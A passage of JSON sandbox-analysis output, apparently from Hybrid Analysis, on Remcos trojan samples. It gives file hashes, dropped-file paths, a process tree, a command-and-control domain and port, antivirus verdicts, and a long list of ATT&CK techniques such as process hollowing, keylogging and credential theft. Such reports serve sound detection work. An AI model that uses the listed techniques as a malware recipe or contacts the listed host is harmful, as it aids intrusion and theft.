KERNELBASE.DLL)\n Found string \"EnumSystemLocalesEx\" (Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2, API is part of module: KERNELBASE.DLL)\n Found string \"GetDateFormatEx\" (Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2, API is part of module: KERNEL32.DLL)\n Found string \"GetTimeFormatEx\" (Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2, API is part of module: KERNEL32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2\" has section name .text with entropy \"6.6333094624526705\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2\" has section name .reloc with entropy \"6.670616452336316\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-412", "type": 9, "relevance": 5, "name": "Spawned process connects to a network", "description": "Process \"C:\\dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" connects to <IPv4> on port 30204 (TCP); Domain: \"computador12.ddns-ip.net\"", "origin": "Monitored Target", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-7", "type": 7, "relevance": 7, "name": "Uses network protocols on unusual ports", "description": "TCP traffic to <IPv4> on port 30204", "origin": "Network Traffic", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645
https://hybrid-analysis.com/sample/fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645
Hybrid Analysis - Remcos
{"size": 498688, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645", "sha256": "fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645", "av_detect": 85, "vx_family": "Trojan.Remcos", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 1, "total_processes": 7, "total_signatures": 244, "extracted_files": [{"name": "app.exe", "file_path": "%APPDATA%\\firefox tsms\\app.exe", "file_size": 498688, "sha256": "fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe (PID: 4436)", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Remcos", "av_matched": 12, "av_total": 22, "file_available_to_download": true}, {"name": "app.exe.bin", "file_size": 498688, "sha256": "fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Remcos", "av_matched": 12, "av_total": 22, "file_available_to_download": true}, {"name": "cfg.dat", "file_path": "%APPDATA%\\firefox mssd\\cfg.dat", "file_size": 190, "sha256": "63da2d0d4fec7c6177a1f1d518523a003525118202bf51a3d2fc1daac54fde16", "type_tags": ["data"], "description": "data", "runtime_process": "app.exe (PID: 2452)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 27053)", "100 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 27053)"], "imported_objects": ["27 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "26 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 26706)", "33 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 26706)", "62 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 26706)", "2 .OBJ Files linked with ALIASOBJ.EXE 11.00 (Internal OLDNAMES.LIB Tool) (build: 41118)", "1 .CPP Files compiled with CL.EXE 15.00 (Visual Studio 2008) (build: 30729)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a medium codebase (100 files)"], "total_file_compositions_imports": 327}, "processes": [{"uid": "00000000-00004436", "name": "fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe", "normalized_path": "C:\\fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe", "sha256": "fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645", "av_label": "Trojan.Remcos", "av_matched": 12, "av_total": 22}, {"uid": "00000000-00002452", "parentuid": "00000000-00004436", "name": "app.exe", "normalized_path": "%APPDATA%\\firefox tsms\\app.exe", "sha256": "fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645", "av_label": "Trojan.Remcos", "av_matched": 12, "av_total": 22}, {"uid": "00000000-00004688", "parentuid": "00000000-00002452", "name": "rmclient.exe", "normalized_path": "%WINDIR%\\system32\\rmclient.exe", "sha256": "325ac8f6e24e883394b71ec21a84b24faa6bffa1d7d255ad2c0b745f4b90328c"}, {"uid": "00000000-00004636", "name": "app.exe", "normalized_path": "%APPDATA%\\firefox tsms\\app.exe", "sha256": "fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645", "av_label": "Trojan.Remcos", "av_matched": 12, "av_total": 22}, {"uid": "00000000-00003064", "parentuid": "00000000-00004636", "name": "app.exe", "normalized_path": "%APPDATA%\\firefox tsms\\app.exe", "sha256": "fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645", "av_label": "Trojan.Remcos", "av_matched": 12, "av_total": 22}, {"uid": "00000000-00004980", "parentuid": "00000000-00004636", "name": "app.exe", "normalized_path": "%APPDATA%\\firefox tsms\\app.exe", "sha256": "fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645", "av_label": "Trojan.Remcos", "av_matched": 12, "av_total": 22}, {"uid": "00000000-00004696", "parentuid": "00000000-00004636", "name": "app.exe", "normalized_path": "%APPDATA%\\firefox tsms\\app.exe", "sha256": "fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645", "av_label": "Trojan.Remcos", "av_matched": 12, "av_total": 22}], "mitre_attcks": [{"tactic": "Resource Development", "technique": "Digital Certificates", "attck_id": "T1588.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Obtain Capabilities", "attck_id": "T1588", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 3, "informative_identifiers_count": 15}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Malicious File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002", "malicious_identifiers_count": 2, "parent": {"technique": "User Execution", "attck_id": "T1204", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 3, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 2, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Office Application Startup", "attck_id": "T1137", "attck_id_wiki": "https://attack.mitre.org/techniques/T1137", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 3, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 3, "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 2, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 3, "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Direct Volume Access", "attck_id": "T1006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1006", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Defense Evasion", "technique": "Code Signing Policy Modification", "attck_id": "T1553.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Web Browsers", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Steal Web Session Cookie", "attck_id": "T1539", "attck_id_wiki": "https://attack.mitre.org/techniques/T1539", "suspicious_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 14}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 23}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 3, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "malicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Desktop Protocol", "attck_id": "T1021.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021/001", "informative_identifiers_count": 1, "parent": {"technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": 